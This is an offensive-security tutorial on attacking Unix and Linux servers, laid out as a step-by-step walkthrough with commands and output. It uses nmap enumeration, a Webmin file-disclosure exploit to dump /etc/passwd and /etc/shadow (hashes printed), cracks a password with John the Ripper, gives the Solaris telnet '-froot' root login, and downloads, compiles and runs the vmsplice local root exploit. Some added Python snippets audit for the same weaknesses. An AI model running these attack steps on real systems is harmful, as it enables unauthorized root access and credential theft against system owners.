The Art of the Unix / Linux Attack (Part Two)

This section opens with an article from Unixlegion discussing network vulnerabilities. It shows that, although some may consider The Art of the Unix and Linux Attack lesson outdated, a large portion of its general principles still apply even as technology advances.


Now that you have finished with Grey-Box Attack – The Art of Microsoft Windows Attack, it is time to move on to the next part of this tutorial: The Art of the Unix / Linux Attack.


We cover the following material:

[0x02a] – Scanning and Enumeration
[0x02b] – Gaining Access
[0x02c] – Escalating Privilege

[0x02] – The Art of Unix / Linux Attack

[0x02a] Linux Attack – Scanning & Enumeration

The first thing of importance before beginning a Unix / Linux attack is to gather as much information as possible.
Any information that can be collected can be used to guess passwords, locate the best points of attack, and uncover other pertinent details.

Remember: no little bit of information is useless or a waste of time collecting. The smallest thing could end up becoming a huge clue further on down the line.

As was discussed in the first section, an attacker’s favorite tool is nmap; it is what attackers use to scan the target system. The reader should already grasp the idea of port scanning and of identifying the specific software behind each port with only one command.


bt cwh # nmap -sV www.target.com

Starting Nmap 4.76 ( http://nmap.org) 
Interesting ports on 192.168.0.111:
Not shown: 987 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp filtered rtsp
1720/tcp filtered H.323/Q.931
2000/tcp filtered callbook
3306/tcp open mysql MySQL (unauthorized)
5060/tcp filtered sip
10000/tcp open http Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
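As an added example (not part of the original article), here is a small Python triage of the nmap -sV output above, written from the defender's side: it parses the port lines and flags open management services and services whose version could not be identified. The sample lines are copied from the scan above; the list of management services is an assumption.

```python
import re

# Constructed sample: service lines copied from the nmap -sV run above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
3306/tcp open mysql MySQL (unauthorized)
10000/tcp open http Webmin httpd
"""

# port/proto  state  service  [version text]
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumption: services that should never face an untrusted network.
# Matched against the nmap service name or the first word of the version.
MANAGEMENT_SERVICES = {"mysql", "webmin"}

def parse_nmap(text):
    """Turn nmap -sV port lines into a list of dicts; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({"port": int(port), "proto": proto, "state": state,
                     "service": service, "version": (version or "").strip()})
    return rows

def audit(rows):
    """Return (port, finding) pairs a defender would act on."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue  # filtered/closed ports are not reachable as-is
        product = r["version"].split(" ")[0].lower() if r["version"] else ""
        if r["service"] in MANAGEMENT_SERVICES or product in MANAGEMENT_SERVICES:
            findings.append((r["port"], "management service exposed"))
        if not re.search(r"\d+\.\d+", r["version"]):
            # No version banner: patch level must be confirmed by other means.
            findings.append((r["port"], "version not identified; check manually"))
    return findings
```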

In the result, one can see that the system runs Webmin, but the exact version is unclear. Webmin version 1.290 has a known file disclosure vulnerability, and the exploit for it is published at http://milw0rm.com/exploits/2017.

Note: A vulnerability disclosure is the practice of reporting security weaknesses in computer hardware and software.

bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:

One should note that the administration software (Webmin) on this host is outdated.

Unix & Linux Attack

[0x02b] Linux Attack – Gaining Access

As the target is a Linux server, it is more difficult to attack remotely than a Windows server.

Most remote exploits that affect Linux target third-party software such as File Transfer Protocol (FTP) servers, Secure Shell (SSH) and web servers. Attackers gain access to Linux servers by exploiting the third-party services that are running on them.

The most vital bits of information found in running third-party services are the users’ details, usually obtained through web application vulnerabilities. Attackers then employ brute-force techniques, as well as social engineering, to obtain information on valid users. In this case, it is highly recommended to use the command below.

bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

The purpose of this command is to read the /etc/shadow file.

root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::

bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

The results are saved to the file shadow.txt, and the attacker then attempts to crack the passwords with John the Ripper (dict.lst is the dictionary file).

bt cwh # john --wordlist=dict.lst shadow.txt
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
user1 (user1)
guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

This reveals that the password of “user1” is “user1”, while the root password could not be recovered. The attacker can now log in to the target system with the credentials of “user1.” Once inside the system, they must figure out a way to increase their privileges.
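As an added example, not from the original article: the two disclosed files are exactly what a defender should audit on their own hosts. The Python below takes a subset of the /etc/passwd and /etc/shadow lines shown above (embedded as constructed sample input) and flags interactive accounts that still use md5crypt ($1$) hashes, the scheme John cracked here, service accounts left with a login shell, and extra uid 0 accounts. Function and finding names are my own.

```python
# Constructed sample: a subset of the /etc/passwd and /etc/shadow lines
# disclosed above, embedded so the audit runs offline.
PASSWD = """\
root:x:0:0::/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:
"""
SHADOW = """\
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
operator:*:9797:0:::::
mysql:*:9797:0:::::
apache:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

def hash_scheme(field):
    """Classify a shadow password field: 'locked', 'empty', '$N$' prefix or 'descrypt'."""
    if field.startswith(("*", "!")):
        return "locked"
    if field == "":
        return "empty"
    if field.startswith("$"):
        return "$" + field.split("$")[1] + "$"   # e.g. "$1$" = md5crypt, "$6$" = sha512crypt
    return "descrypt"                            # bare 13-char traditional DES hash

def audit_accounts(passwd, shadow):
    """Return (user, finding) pairs from a passwd/shadow pair."""
    shadow_by_user = {l.split(":")[0]: l.split(":")[1] for l in shadow.splitlines()}
    findings = []
    for line in passwd.splitlines():
        user, _, uid, _gid, _gecos, _home, shell = line.split(":")
        shell = shell or "/bin/sh"   # an empty shell field means /bin/sh, so user1 can log in
        interactive = shell not in NOLOGIN_SHELLS
        scheme = hash_scheme(shadow_by_user.get(user, "!"))
        if interactive and scheme == "$1$":
            findings.append((user, "interactive account with md5crypt hash"))
        if interactive and scheme == "empty":
            findings.append((user, "interactive account with empty password"))
        if interactive and scheme == "locked":
            findings.append((user, "service account with login shell"))
        if int(uid) == 0 and user != "root":
            findings.append((user, "extra uid 0 account"))
    return findings
```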

An additional example is a telnet vulnerability on Solaris 10/11. This vulnerability allows the attacker to log in with little to no resistance as root. The attacker simply sends [telnet “-froot” 192.168.0.112] to the telnet daemon on Solaris 10/11.

bt cwh # telnet "-froot" 192.168.0.112

Using: 192.168.0.112
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2007
# id
uid=0(root) gid=0(root)
#

By using this technique, there is no need to escalate privilege since the attacker is already logged in under root privilege.

Unix / Linux Attack – Escalation of Privileges

[0x02c] – Escalating Privilege

This section introduces a Linux attack that uses a local root exploit against the Linux system. Such exploits can be found at milw0rm.com. The initial tasks after one has gained access to the Linux system are to check the Linux kernel version and the user ID.

user1@linuxserver:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
user1@linuxserver:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)

The output of these two commands guides the next step of this Linux attack: elevating the attacker’s privilege to make them the system’s root. It should be mentioned that there is a local root exploit for Linux 2.6.17 – 2.6.24 on milw0rm.com. Once the root exploit is downloaded, compiled, and run, it looks like the output shown below.
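An added example, not from the original article: a defender’s screening check that extracts the kernel release from uname -a and tests whether it falls inside the 2.6.17 – 2.6.24 range quoted above. The range bounds and the first sample string come from this page; the other samples and the helper names are my own.

```python
import re

# Vulnerable upstream kernel range quoted above for the vmsplice local root exploit.
VULN_RANGE = ((2, 6, 17), (2, 6, 24))

# Constructed samples; the first is the uname -a line shown above.
SAMPLES = [
    "Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux",
    "Linux hostb 2.6.24 #1 SMP Thu Jan 24 00:00:00 UTC 2008 x86_64 GNU/Linux",
    "Linux hostc 2.6.25-1 #1 SMP Sat Apr 19 00:00:00 UTC 2008 x86_64 GNU/Linux",
]

def kernel_release(uname_a):
    """The release is the third whitespace-separated token of uname -a."""
    return uname_a.split()[2]

def version_tuple(release):
    """'2.6.17-10-server' -> (2, 6, 17); distro suffixes after '-' are dropped."""
    base = release.split("-")[0]
    parts = [int(p) for p in re.findall(r"\d+", base)]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])

def in_vulnerable_range(release, lo=VULN_RANGE[0], hi=VULN_RANGE[1]):
    """True if the upstream version lies in [lo, hi].

    Caveat: distribution kernels often carry backported fixes, so a hit here
    is a screening signal to confirm against the vendor's advisories, not proof.
    """
    return lo <= version_tuple(release) <= hi

def triage(uname_lines):
    """Map each host's release string to whether it needs follow-up."""
    return {kernel_release(l): in_vulnerable_range(kernel_release(l)) for l in uname_lines}

if __name__ == "__main__":
    for rel, hit in triage(SAMPLES).items():
        print(f"{rel:20s} {'CHECK' if hit else 'ok'}")
```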

user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
--17:17:21-- http://milw0rm.com/exploits/5092
=> `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified

[ >>> ] 7,197 11.58K/s
17:17:23 (11.58 KB/s) - `5092' saved [7197]
user1@linuxserver:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
user1@linuxserver:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
root@linuxserver:~# id
uid=0(root) gid=0(root) groups=1001(root)

At this point, the attacker has, in essence, become root on the targeted server.


When you are done studying this section, please continue to SQL Injection Cheat Sheet | Auto Pwn | Metasploit.
